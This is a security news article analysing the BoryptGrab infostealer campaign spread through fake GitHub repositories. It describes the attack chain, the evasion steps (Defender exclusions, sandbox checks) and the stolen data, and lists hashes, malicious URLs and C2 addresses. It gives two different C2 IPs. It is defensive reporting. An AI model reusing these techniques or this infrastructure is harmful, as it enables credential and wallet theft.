GitHub exploited: Hundreds of fake projects are silently stealing user data

Overview

GitHub has always been considered an indispensable part of the global software development ecosystem. Millions of developers use this platform to share projects, collaborate on development, and distribute open-source tools. However, its popularity and high level of trust also make GitHub an attractive target for cyberattack groups.

In March 2026, experts at Trend Micro discovered a new malware campaign called BoryptGrab, spreading through hundreds of public GitHub repositories masquerading as free software tools and game cheats. The campaign uses SEO keywords to boost search rankings, leading victims to fake GitHub Pages download sites to download ZIP files containing malware.

According to investigation reports, over 100 malicious repositories were used in this campaign, indicating a significant level of organization and scale. The BoryptGrab malware primarily focuses on stealing critical data such as browser login information, session cookies, system data, and even cryptocurrency wallet details. In some cases, the malware also deploys remote access mechanisms to maintain long-term control over the victim's device.

The cause of the campaign

Users believe repositories on GitHub are trustworthy. Attackers optimize README files so repositories appear on Google. GitHub allows quick and public repository creation. Users download and run executable files from unverified sources.

Initial impact

• Login credentials and passwords stored in the browser.

• Session cookies for online services.

• Cryptocurrency wallet data.

• System information and device configuration.

The theft of this data can lead to account takeovers, financial fraud, or unauthorized access to online systems.

Attack vector

Typically, users search on Google for keywords like free software download, game cheat / FPS booster, or cracked software. Recognizing this, attackers created over 100 GitHub repositories with READMEs filled with SEO keywords to rank high in search results. Some tools that have been commonly spoofed by attackers include Voicemod Pro, Filmora crack, Valorant FPS booster, and CS2 skin changer.

After the victim accesses the repository, they will see a section of the README with detailed descriptions and download instructions, along with a "Download latest release" link. However, these repositories typically do not contain actual source code, only download links.

After clicking download, the victim doesn't download the file directly but is instead redirected through multiple steps, each serving as a perfect stepping stone in a sophisticated attack chain.

The URLs here all use Base64 encoding and AES encrypted links to perfectly conceal the source of the malware.

The final redirect leads to a webpage containing a malicious Zip file, named similarly to the real tool to minimize suspicion. The typical structure of these Zip files includes malicious sub-files: tool.exe, libcurl.dll, launcher payload, or stealer payload.

After completing the download of the malicious Zip file without any suspicion, the user will begin the process of executing the malware on their personal computer. At this point, a DLL Sideloading will start to activate the entire "libcurl.dll" process.

This DLL will decrypt the payload using XOR + AES-CBC.

Alongside the malicious DLL, attackers also use another variant: a "VBS script."

It will execute PowerShell commands to download the payload onto the victim's machine. Additionally, it adds Windows Defender exclusions to avoid detection.

During the behavior analysis, experts noted a crucial step: the Stealer's verification process. Before running, it performs several specific actions: checking the VM registry, examining the sandbox environment, and inspecting the system path. All these processes aim to determine if the malware is running in a virtualized environment. If it detects virtualization, it will immediately stop and terminate its lifecycle.

After successfully running, BoryptGrab will begin stealing information, starting with data from browsers like Chrome, Firefox, Edge, Brave, and Opera. Here, the attacker targets passwords, cookies, and autofill data—considered valuable assets on the browser. Additionally, the malware bypasses Chrome App-Bound Encryption to access protected credentials.

Besides browser data, BoryptGrab can collect information from cryptocurrency wallet applications like Exodus, Electrum, Ledger, or Trezor on desktop computers and browser extensions. BoryptGrab then takes screenshots and gathers system information.

Additionally, during the analysis, experts also discovered several new variants of BoryptGrab being used, notably the "TunnesshClient backdoor."

This backdoor will create a reverse SSH tunnel and function as a SOCKS5 proxy, allowing the attacker to remotely access the target system.

All the collected data will be sent to the attacker's C2 server at 193.143.1.104 via Port 5000 using the HTTP POST protocol.

Conclusion

The BoryptGrab campaign highlights the trend of threat actors increasingly exploiting reputable developer platforms like GitHub to distribute large-scale malware. With hundreds of repositories, numerous build variants, and diverse payloads (stealer + backdoor + Vidar), this is an actively ongoing campaign. Users need to be extremely cautious when downloading "free" software from GitHub, especially crack/cheat game tools.

Recommendations

Check the reliability of the repository before downloading.

• Avoid downloading and running software immediately from unfamiliar repositories. Users should:

  • Check the number of stars, forks, and contributors of the project

  • Review the commit history to assess the repository's activity level

  • Examine the account of the repository creator (new accounts may be suspicious)

  • Read the Issues and Discussions sections to see community feedback

• Malicious repositories often have a very short commit history or contain only a few simple files.

Do not run executable files downloaded from the Internet directly.

• Many malware are distributed as:

  • file .exe

  • file .bat

  • file .ps1

  • file .scr

  • file .msi

  Users should:

  • Scan the file with antivirus software

  • Check the file's digital signature

  • Avoid running the file immediately after extracting

Analyze the source code before use.

• For open-source projects, you should:

  • Read the README file and source code

  • Check installation scripts (install.sh, setup.ps1, build scripts)

  • Pay attention to code segments that download files from external URLs

Protect browser data and accounts

• Infostealers like BoryptGrab often target credentials stored in the browser. Therefore, users should:

  • Use a dedicated password manager instead of saving passwords directly in the browser

  • Enable multi-factor authentication (MFA) for important accounts

  • Regularly check for unusual login activity

Update the system and security software.

• Always ensure that:

  • Ensure the operating system is updated with the latest patches.

  • Antivirus/endpoint protection software is fully operational.

  • Enable real-time protection.

Mapping MITRE ATT&CK

Phase	Technique	ID
Initial Access	Search engine poisoning / user download	T1189
Resource Development	Create malicious infrastructure	T1583
Execution	User execution	T1204
Execution	PowerShell	T1059.001
Execution	VBS script	T1059
Defense Evasion	DLL sideloading	T1574.002
Defense Evasion	Modify Defender exclusions	T1562
Discovery	System information discovery	T1082
Credential Access	Credential dumping (browser)	T1555
Collection	Data from local system	T1005
Command & Control	Reverse SSH tunnel	T1090
Exfiltration	Exfiltration over C2	T1041

IOCs

File Hash

• fa767391b99865f8533efc1fe6dfa6175215718679fb00ca85fc13c3bd4ae4b7

• d295720bc0c1111ce1c3d8b1bc1b36ba840f103b3ca7e95a5a8bf03e2cc44fe5

• 1bd605ef84b6767df74bd6290f1468eed5a88264df23fcf70b6a75d5bdcf7d76

• 15de71073f44c657c23f5f97caa11f1b12e654d4d17684bfc628cc1e5b6bcdd5

• 4e90d386c1c7d3d1fd4176975795a2f432d95685690778e09313b4a1dbab9997

• 4264a88035aa0b63e9aef96daa78a58114d60a344ea10168a8ef5ef36bf8edbd

• 433a13cc70396f80dc29d1150c050339d78964fdc91bcdc3f40c67a77add1476

• 7f2315b89fb9a47e1516def136844d617bfcdce19000a1b0436706692dbe166c

• 449f528f5ceae8c3f8336d0d8e3e3ec9031d1ad67c31ee7311b67e01d5fdf225

• c40b9913e79c5dd09751b1afb03aaa98658bab61bacf27a299abd84fd44fe707

• 2abe0ef88ba92db79d82cde4c0ed1f382bb347517a54ea82084c841d0f955518

• 2050468744e44554fac17fb83f1515c95f2f2236716e2b5267a81c2b94205e6a

• fe4e5fb28d2c2b3a640112b6b125ce8c4afa8be28342e3bfda097ad9dd2ef9ee

• ed1745cc49b929e499966d87e163219fe0f24069fe88dfacbd69c0ebab85a640

• 576692df4bf1c7d8927d3a183f5219a81c3bff3dd22971691f8af6889f80c5a0

• 0434437a073a3f3a49e84d5ecb20c99dd551bacc32bf100fbb8cf67a50642181

URL

• hxxps://github[.]com/Voicemod-Pro-Download-Tool

• hxxps://voicemod-pro-download-tool.github[.]io/.github/

• hxxps://github[.]com/Voicemod-Pro-Download-Tool/.github

• hxxps://kiamatka[.]com/kaiok.kakman

• hxxps://best-tinted[.]com/github-download.html

• hxxps://github[.]com/PassFab-4WinKey-Windows-Password-Reset

• hxxps://github[.]com/Yim-Mod-Menu/.github

• hxxps://github[.]com/Arena-Breakout-Infinite-ESP/.github

• hxxps://github[.]com/Graphic-Editor-Krita/.github

• hxxps://botshield[.]vu/kFcjld

• hxxps://botshield[.]vu/KKRkm9

C2

• 45.93.20[.]61

Refer to

1. Massive GitHub malware operation spreads BoryptGrab stealer

2. New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages | Trend Micro (US)

3. BoryptGrab Malware Exploits GitHub | Security News

4. BoryptGrab Stealer Spreads via Fake GitHub Repositories, Stealing Browser and Crypto Wallet Data | Cryptika Cybersecurity